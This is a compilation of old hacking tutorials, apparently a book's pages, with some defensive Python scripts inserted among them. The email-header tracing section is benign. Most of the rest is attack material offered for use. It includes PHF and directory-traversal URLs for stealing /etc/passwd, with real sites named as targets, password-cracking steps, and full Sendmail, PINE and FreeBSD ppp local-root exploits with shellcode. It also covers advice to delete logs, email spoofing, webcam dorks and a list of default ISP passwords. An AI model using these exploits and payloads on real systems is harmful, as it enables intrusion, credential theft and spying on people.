According to the From header this message is from Tahir at s359dyxtt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be a waste of time. This message didn't come from Yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the IP address 12.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain the email system becomes untrusted. I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the IP 193.12.169.0. Those of you who know anything about IP will realize that this is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.
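The reasoning in the last three paragraphs (walk the Received chain bottom-up, trust only the hop your own server recorded, and sanity-check the host and IP it names) can be scripted. The following is an added example, not code from the book: it parses the header block quoted above (reproduced here as a constructed sample, body omitted) with Python's standard `email` module and reports each hop with the same observations the text makes. The trusted server set, the `.0`/`.255` network-address heuristic and the `.client.` hostname heuristic are assumptions of this example; with modern CIDR allocations a `.0` address can occasionally be a real host, so they are hints, not proof.

```python
import email
import re

# Constructed sample reproducing the header block quoted above; the message
# body is omitted. Not a live capture.
SAMPLE_HEADERS = """\
Return-Path: <s359dyxtt@yahoo.com>
X-Original-To: davar@example.com
Delivered-To: davar@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108]) by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7 for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>
From: "Tahir" <s359dyxtt@yahoo.com>
To: ukhacker@example.com
Subject: STOP-PAYING For Your PAY-PER-VIEW

"""

RECEIVED_RE = re.compile(r"from\s+(?P<from>.*?)\s+by\s+(?P<by>\S+)", re.S)
IPV4_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"\(HELO\s+(\S+)\)")


def parse_received(value):
    """Pull the sending host, its bracketed IP and the recording server out of one Received header."""
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    from_part = m.group("from")
    ip = IPV4_RE.search(from_part)
    helo = HELO_RE.search(from_part)
    # "from (HELO name) [ip]" is the form a server writes when reverse DNS gave nothing
    host = helo.group(1) if helo else from_part.split()[0]
    return {"host": host, "ip": ip.group(1) if ip else None, "by": m.group("by")}


def hop_findings(hop, trusted_servers):
    """Plain-language notes about one hop, from the receiving side's point of view."""
    notes = []
    if hop["by"] in trusted_servers:
        notes.append("recorded by our own server, so host and IP can be taken at face value")
    else:
        notes.append("recorded by a foreign server: untrusted, may be forged")
    if hop["ip"] and hop["ip"].rsplit(".", 1)[1] in ("0", "255"):
        notes.append("last octet 0/255: network or broadcast address, not a host, so almost certainly bogus")
    if ".client." in hop["host"]:
        notes.append("'client' hostname: a customer machine, not an authorised mail server")
    return notes


def backtrack(raw, trusted_servers):
    """Hops in chronological order (bottom Received header first), each with its findings."""
    msg = email.message_from_string(raw)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    hops.reverse()  # every relay prepends its header, so the last one is the earliest
    return [(hop, hop_findings(hop, trusted_servers)) for hop in hops]


def abuse_contact_ip(raw, trusted_servers):
    """IP of the nearest hop recorded by a server we trust: the address worth reporting."""
    for hop, _ in reversed(backtrack(raw, trusted_servers)):
        if hop["by"] in trusted_servers:
            return hop["ip"]
    return None


if __name__ == "__main__":
    trusted = {"mailhost.example.com"}  # assumption: our own mail server
    for n, (hop, notes) in enumerate(backtrack(SAMPLE_HEADERS, trusted), 1):
        print(f"hop {n}: {hop['host']} [{hop['ip']}] -> {hop['by']}")
        for note in notes:
            print("   -", note)
    print("report to the owner of:", abuse_contact_ip(SAMPLE_HEADERS, trusted))
```

The result matches the hand analysis: the hop recorded by mailhost.example.com points at 12.218.172.108 (the address to look up with whois), while the hop below it was written by an untrusted machine and names a non-host address, so nothing in it should be used to blame anyone.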

Here's where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1) 12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12218-168-0-1) 12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

OK, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address-to-hostname mapping of the remote server, 12-218-172-108.client.mchsi.com. If I put www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message; the best you can hope for is to find out what host sent it. Even in the case of a PGP-signed message there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

Hacking server:

I am asked at least 5 or more times a day by young, beginning "hackers", "How can I hack?" or "Is there a way to hack a web site?" Well, there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow, and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don't know.

Part 1: Simple UNIX Commands

Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account.

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM

CD = CD

To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using.

Part 2: Cracking Passwords

On UNIX systems the file that contains the passwords for all the users on the system is located in the /etc directory. The filename is passwd. I bet you're thinking, "Great. All I have to do is get the file called /etc/passwd and I'll be a hacker." If that is what you are thinking then you are dead wrong. All the accounts in the passwd file have encrypted passwords. These passwords are one-way encrypted, which means that there is no way to decrypt them. However, there are programs that can be used to obtain passwords from the file. The name of the program that I have found to be the best password cracker is called "Cracker Jack." This program uses a dictionary file composed of thousands of words. It compares the encrypted forms of the words in the list to the encrypted passwords in the passwd file and notifies you when it finds a match. Cracker Jack can be found at my web site, which is at http://www.geocities.com/SiliconValley/9185. Some wordlists can be found at the following ftp site: sable.ox.ac.uk/pub/wordlists. To get to the wordlist that I usually use, go to that ftp site, then go to the American directory. Once you are there download the file called dic-0294.tar.Z, which is about 4 MB. To use that file it must be uncompressed

Page 318


Power Of Hacking速 using a program like Gzip for DOS or Winzip for Windows. After uncompressing the file it should be a text file around 8 MB and it is best to put it in the same directory as your cracking program. To find out how to use Cracker Jack just read the documentation that is included with it.

Part 3: The Hard Part (Finding Password Files)

Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It's common sense: if the system administrator has a file that has passwords for everyone on his or her system they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are 2 simple ways that this can sometimes be accomplished. Often the /etc directory is not blocked from FTP. To get the passwd file this way, try using an FTP client to access the site anonymously, then check the /etc directory to see if access to the passwd file is restricted. If it is not restricted then download the file and run Cracker Jack on it. If it is restricted then try plan B. On some systems there is a file called PHF in the /cgi-bin directory. If there is then you are in luck. PHF allows users to gain remote access to files (including the /etc/passwd file) over the world wide web. To try this method go to your web browser and type in this URL: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Then substitute the site you are trying to hack for the xxx.xxx.xxx. For example, if I wanted to hack St. Louis University (and I have already) I would type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Don't bother trying www.slu.edu because I have already done it and told them about their security flaw. Here's a hint: try www.spawn.com and www.garply.com

If the preceding two methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to "unshadow" a password file, but sometimes there are backup password files that aren't shadowed. Try looking for files such as /etc/shadow and other stuff like that.

Part 4: Logging In To "Your" New Shell

OK....This is where you use what you found using Cracker Jack: usernames and passwords. Run your telnet client and telnet to the server that you cracked the passwords for, such as www.slu.edu. When you are connected it will give a login screen that asks for a login name and password and usually information on the operating system that the server is using (usually UNIX, linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just type in the information you got after cracking the passwd file and use whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn't spreading viruses or causing damage to other computer systems. It is using your knowledge to increase your knowledge.

Part 5: Newbie Info

If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and, if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple of internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage.

Hacking Webpage - The Ultimate guide

Well, Psychotic wrote one of the most helpful unix text files in cyberspace, but with the mail that we received after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody, so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic are proud to release "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok, well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
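To make the shadowed/unshadowed distinction concrete, here is an added audit script in Python; it is not from the text or from any cracker it names. It parses passwd-style lines, classifies the password field and flags the rows an administrator should review (an exposed hash, an empty password, a second UID-0 account like the smtp entry above); the sample lines are constructed from the examples above.

```python
"""Audit /etc/passwd-style lines: tell shadowed entries from entries that expose
a hash, and flag rows an administrator should review."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class PasswdEntry:
    name: str
    pw_field: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd_line(line: str) -> PasswdEntry:
    """Split one colon-separated passwd line into its seven fields.

    Raises ValueError for a line that is not seven fields or whose uid/gid
    are not integers (the garbled first example above trips this check)."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        raise ValueError(f"expected 7 fields, got {len(parts)}: {line!r}")
    name, pw, uid, gid, gecos, home, shell = parts
    return PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell)


def classify_password_field(pw_field: str) -> str:
    """'shadowed': 'x', the hash lives in /etc/shadow (root-readable only).
    'locked':   starts with '*' or '!', no password login possible.
    'empty':    no password at all.
    'hash':     the crackable hash sits in this world-readable file."""
    if pw_field == "":
        return "empty"
    if pw_field == "x":
        return "shadowed"
    if pw_field[0] in "*!":
        return "locked"
    return "hash"


def audit_passwd(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (finding, subject) pairs in file order."""
    findings: List[Tuple[str, str]] = []
    for raw in lines:
        if not raw.strip() or raw.startswith("#"):
            continue
        try:
            entry = parse_passwd_line(raw)
        except ValueError:
            findings.append(("malformed", raw.strip()))
            continue
        kind = classify_password_field(entry.pw_field)
        if kind == "hash":
            findings.append(("hash-exposed", entry.name))
        elif kind == "empty":
            findings.append(("empty-password", entry.name))
        # A second UID-0 account is root under another name (see 'smtp' above).
        if entry.uid == 0 and entry.name != "root":
            findings.append(("extra-uid0", entry.name))
    return findings


# Constructed sample, modelled on the example files quoted above.
SAMPLE_PASSWD = [
    "root:User:d7Bdg:1n2HG2:1127:20:Superuser",
    "BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh",
    "root:x:0:1:Superuser:/:",
    "smtp:x:0:0:mail daemon user:/:",
    "ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false",
    "guest::1001:100:Guest account:/home/guest:/bin/sh",
]

if __name__ == "__main__":
    for finding, subject in audit_passwd(SAMPLE_PASSWD):
        print(f"{finding:15} {subject}")
```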

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1. The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well, exploits are the best way of hacking webpages but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, you can just do a netsearch and find everything you need. It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
    execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
    execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
    setuid(0); setgid(0);
    system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
    echo "leet..."
    /tmp/x
fi

and now on to another exploit. I’m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was written by Sean B. Hamor. For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
-rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
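The lock-file race above is a case of insecure file creation in a shared directory. The following added example (mine, not PINE's code or the text's) shows the naive create beside a hardened one, exercised in a throwaway directory; the lock-file name is taken from the transcript and the pid value is constructed.

```python
"""The PINE lock-file problem is insecure file creation in a shared directory:
a predictable name, a world-writable mode, and an open() that follows whatever
symlink an attacker pre-planted. A naive create beside a hardened one."""
import os
import tempfile
from typing import Dict


def naive_create(path: str, data: bytes, mode: int = 0o666) -> None:
    """Mimics the behaviour described above: follows a symlink and writes
    wherever it points, and asks for a world-writable (666) file."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, mode)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def safe_create(path: str, data: bytes, mode: int = 0o600) -> None:
    """O_EXCL fails if anything already exists at path (a symlink included,
    dangling or not); O_NOFOLLOW refuses to follow a symlink at the last
    component. The file is created owner-only instead of 666."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, mode)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def demo(use_safe: bool) -> Dict[str, object]:
    """Plant a symlink lockfile -> victim file, then create the lockfile the
    way a program would. Returns whether the create was refused and what the
    victim file contains afterwards."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "rhosts")     # stands in for ~hamors/.rhosts
        lock = os.path.join(d, ".302.f5a4")    # lock-file name from the transcript
        with open(victim, "wb") as f:
            f.write(b"original\n")
        os.symlink(victim, lock)               # the attacker's pre-planted link
        refused = False
        try:
            create = safe_create if use_safe else naive_create
            create(lock, b"1756\n")            # constructed pid, as PINE would write
        except OSError:
            refused = True
        with open(victim, "rb") as f:
            contents = f.read()
        return {"refused": refused, "victim": contents}


if __name__ == "__main__":
    print("naive:", demo(False))   # victim overwritten through the symlink
    print("safe: ", demo(True))    # create refused, victim untouched
```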

Now on to another one; this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work. This is how you set it up:

#include
#include
#include

#define BUFFER_SIZE 156 /* size of the buffer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */

long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

main(int argc, char *argv[])
{
    char *buf = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
    int i,j;

    buf = malloc(4096);

    /* fill start of buffer with nops */
    i = BUFFER_SIZE-strlen(execshell);
    memset(buf, 0x90, i);
    ptr = buf + i;

    /* place exploit code into the buffer */
    for(i = 0; i < strlen(execshell); i++)
        *ptr++ = execshell[i];

    addr_ptr = (long *)ptr;
    for(i=0;i < (104/4); i++)
        *addr_ptr++ = get_esp() + OFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    setenv("HOME", buf, 1);

    execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root, "what's next?" Well, the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while; you can now upload your pages, delete all the logs and just plain do your worst things.

Fastest way to hack into someone's computer

Well, as I already mentioned, you can hack any system as long as it is connected to what we call the INTERNET. To connect to the Internet a system allocates a port for communication and data transfer. So here it goes: all we got to do is get into that port, that's hacking. Read more to see the full steps.

Steps:
1. Download the software PORT SCANNER. Also you could use the port scanner from Nettools. Download link on my blog.
2. Copy the ip address of the victim whose port is open.
3. Download NETLAB which gives you all information including the victim's ip address, the area from where he is accessing the Internet....
4. Paste the ip of the victim you found initially into NETLAB. That's it, you access his system.

Use telnet to send email from anyone's email to anyone

Send anonymous email from anyone to anyone. You heard it right: from any email ID to any email ID. You can send any email to your friend from their email ID. Or you might even send someone an email from Steve Jobs's email. Here is the simple hack that lets you do just that using the most common feature available in all computers. Just follow the simple procedure. And do comment for any help.

1 Open the cmd prompt. (Start -> Run or press win key + R, then type cmd and press OK.)

2 Type telnet server.com 25 (where "server.com" is the name of the smtp (outgoing) server of your email provider, such as smtp-server.austin.rr.com). This can be found by checking your account info in the program you normally use for email.

3 Type HELO server.com. (Or "EHLO server.com")

4 Type MAIL FROM:you@server.com.

5 You may get a message saying "250 ok".

6 Type RCPT TO:Friend1@anotherserver.com, friend_two@someotherserver.org, friend.3three@Someserver.com, etc.

7 Again, you may get a message saying "250 ok".

8 To write the message, type DATA and press Enter.
   1. On the first line type SUBJECT:yoursubject and press Enter twice.
   2. Continue typing your message.
   3. Put a single period (.) on a line by itself and press Enter to send your message. The server should say 'Message accepted for delivery'. (Or it says 250 OK id=`a long id`)

9 Type QUIT to exit Telnet.

This will not work if your ISP uses dynamic IP to give you internet access. If you could try using some botnet server that is quite easy. If you would request I would post a tutorial for that as well. Well, use the hack at your own risk as you can easily be traced back, as each email also sends your IP. You might use some IP re-routing software like anonymizer. But still use it cautiously. And this post was only for educational purpose.

(Internet WebCam) Without Software

You know you can hack a web camera? Even if you're not a hacker, you can easily hack an internet webcam. You might wonder whether you will need some huge and complex software, some coding skills... or something like that? No! But "hacking" without any coding skills? Seriously? Psst. Okay, it's not a "HACK"; it's just a trick. But it's awesome, really! All you need is access to Google Search and a java plugin to view video (that's already installed in every browser, mostly). So, let's move ahead.

First go to the Google search website (www.google.com) and then in the search box type: "inurl:/view/index.shtml" (without quotes). Then press enter. (Noob tip: Copy and paste the text, instead of typing it again.) Google will then show the list of cameras working on the net. That's it! Trick over.

Note: If you type the IP address of the computer in place of inurl then the web camera of that computer can be hacked. Did I just say "hacked"? Indeed, I did. But it wasn't supposed to be a "hack" at all, you said... Actually... *read on*

Example: Here is an example of the search. Your query will look something like this: 207.111.165.30/view/index.shtml. The above search query will show the webcam used at that IP address. The other Google search links which make web cameras publicly viewable are as follows:

inurl:/view.shtml
intitle:"Live View / - AXIS" | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motion"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"

PTCL passwords in major use: 123456 abc/123 abc-123 uvwxyz abc.133 ptcl123 apc-123 ptclptcl abc-123 ptcl 0786

Computer Nul

IIS EXPLANATION:

***************************************************************************
*                      Guide to IIS Exploitation                          *
*                           by fugjostle                                  *
*                             V.1.0.1                                     *
*        Questions? Comments? Email: fugjostle at ch0wn.com               *
***************************************************************************

Disclaimer: I do not condone hacking IIS servers in any way, shape or form. This guide is intended as a guide for admins to help them understand what most script kiddies don't understand but are happy to exploit.

--[On the first day, God created directory traversal]

Relative paths are the developer's friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, let's say we have a webpage called 'pictures.html' in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html
Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem, I hear you ask... well, the programmers of the web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the server's directory structure and request files that the web server has access to. For example,

http://www.target.com/../../../etc/passwd

NB. you can also use double dots and double quotes. This is useful to evade Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request. This is the same as the previous example and can make string matching IDS's work for their money.

--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser routines to check for naughty URLs and keep the requests within the document root. Then along comes a wily hacker who wonders whether, if the URL is encoded, it will still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:

(1) On the first decode, the string will be converted to:

"http://victim.com/..%2f..%2fdocs/"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

"http://victim.com/../../docs/"

[%2f = '/']

--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:

----------------------------------------------------------------
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. The Unicode Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, Sun, Sybase, Unisys and many others. Unicode is required by modern standards such as XML, Java, ECMAScript (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official way to implement ISO/IEC 10646. It is supported in many operating systems, all modern browsers, and many other products.
-----from http://www.unicode.org---------------------------------

The problem with Unicode is that it requires 16 bits for a single character, and software tended to use 8 bits for a single character. So the 8-bit Unicode Transformation Format (UTF-8) was created. This allows for multibyte encoding where a variable number of bytes can be used for each character:

Character   1-byte   2-byte   3-byte
